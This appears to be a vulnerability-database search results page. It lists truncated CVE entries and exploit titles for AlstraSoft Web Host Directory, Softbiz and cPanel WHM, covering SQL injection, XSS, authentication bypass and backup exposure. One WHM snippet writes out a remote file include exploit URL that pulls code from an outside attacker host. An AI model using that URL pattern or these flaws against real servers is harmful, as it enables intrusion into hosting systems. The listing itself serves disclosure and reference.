132 matches found
Softbiz Web Host Directory Script - 'host_id' SQL Injection
\ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV89$2008 ----------------------------------------------------------------------------------------- ECHOADV89$2008 Softbiz Web Host Directory Script searchresult.php hostid Blind Sql Injection Vulnerability...
whm-rfi.txt
name : web host manager vendor : cpanel.net by : s3rv3rhack3r ali at hackerz dot ir web-site : www.hackerz.ir - ali.hackerz.ir exploit: http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?...
remote file include in whm (all version)
name : web host manager vendor : cpanel.net by : s3rv3rhack3r ali at hackerz dot ir web-site : www.hackerz.ir - ali.hackerz.ir exploit: http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?...
CVE-2006-6818
AlstraSoft Web Host Directory allows remote attackers to bypass authentication and change the admin password via a direct request to admin/config...
CVE-2006-6817
AlstraSoft Web Host Directory allows remote attackers to obtain sensitive information by requesting any invalid URI, which reveals the path in an error message, a different vulnerability than CVE-2006-2617...
CVE-2006-6819
AlstraSoft Web Host Directory stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a backup database via a direct request for admin/backup/db...
CVE-2006-6817
The CVE-2006-6817 issue affects AlstraSoft Web Host Directory (also listed as HyperStop WebHost Directory 1.2). Affected component: login/URI handling that, when an invalid URI is requested, exposes the installation path in the error message, enabling a remote attacker to obtain sensitive informa...
CVE-2006-6818
AlstraSoft Web Host Directory allows remote attackers to bypass authentication and change the admin password via a direct request to admin/config...
CVE-2006-6819
AlstraSoft Web Host Directory stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a backup database via a direct request for admin/backup/db...
CVE-2006-6817
AlstraSoft Web Host Directory allows remote attackers to obtain sensitive information by requesting any invalid URI, which reveals the path in an error message, a different vulnerability than CVE-2006-2617...
CVE-2006-6819
CVE-2006-6819 concerns AlstraSoft Web Host Directory, where sensitive information is stored under the web root due to insufficient access control. The vulnerability allows remote attackers to download a backup database by issuing a direct request to admin/backup/db. The public records indicate th...
CVE-2006-6818
CVE-2006-6818 affects AlstraSoft Web Host Directory. The vulnerability allows remote attackers to bypass authentication and change the admin password via a direct request to /admin/config. CVSS v2 base score 7.5 (HIGH) with network attack vector and no authentication required; impact includes par...
CVE-2006-2616
SQL injection vulnerability in the search script in 1 AlstraSoft Web Host Directory 1.2, aka 2 HyperStop WebHost Directory 1.2, allows remote attackers to execute arbitrary SQL commands via the uri parameter...
Sql injection
1 AlstraSoft Web Host Directory 1.2, aka 2 HyperStop WebHost Directory 1.2, allows remote attackers to obtain the installation path via an invalid entry in the Username field on the login page, which causes the path to be displayed in an SQL error. NOTE: this issue might be resultant from SQL...
Cross site scripting
Cross-site scripting XSS vulnerability in 1 AlstraSoft Web Host Directory 1.2, aka 2 HyperStop WebHost Directory 1.2, might allow remote attackers to inject arbitrary web script or HTML via the "write a review" box. NOTE: since user reviews do not require administrator privileges, and an...
CVE-2006-2618
The CVE-2006-2618 entry describes a cross-site scripting (XSS) vulnerability in AlstraSoft Web Host Directory 1.2 and HyperStop WebHost Directory 1.2, exploitable via the "+write a review" box. The flaw allows remote attackers to inject arbitrary web script or HTML, with the issue arising because...
CVE-2006-2617
Affected products: AlstraSoft Web Host Directory 1.2 (aka HyperStop WebHost Directory 1.2). Root cause: an invalid entry in the Username field on the login page can produce an SQL error that reveals the installation path, potentially due to SQL injection. Impact: partial disclosure of installatio...
CVE-2006-2618
Cross-site scripting XSS vulnerability in 1 AlstraSoft Web Host Directory 1.2, aka 2 HyperStop WebHost Directory 1.2, might allow remote attackers to inject arbitrary web script or HTML via the "write a review" box. NOTE: since user reviews do not require administrator privileges, and an...
CVE-2006-2616
SQL injection vulnerability in the search script in 1 AlstraSoft Web Host Directory 1.2, aka 2 HyperStop WebHost Directory 1.2, allows remote attackers to execute arbitrary SQL commands via the uri parameter...
CVE-2006-2616
The CVE-2006-2616 entry describes an SQL injection in the search script of AlstraSoft Web Host Directory 1.2 (also listed as HyperStop WebHost Directory 1.2). The vulnerability allows remote attackers to execute arbitrary SQL commands via the uri parameter, enabling potential data exposure or mod...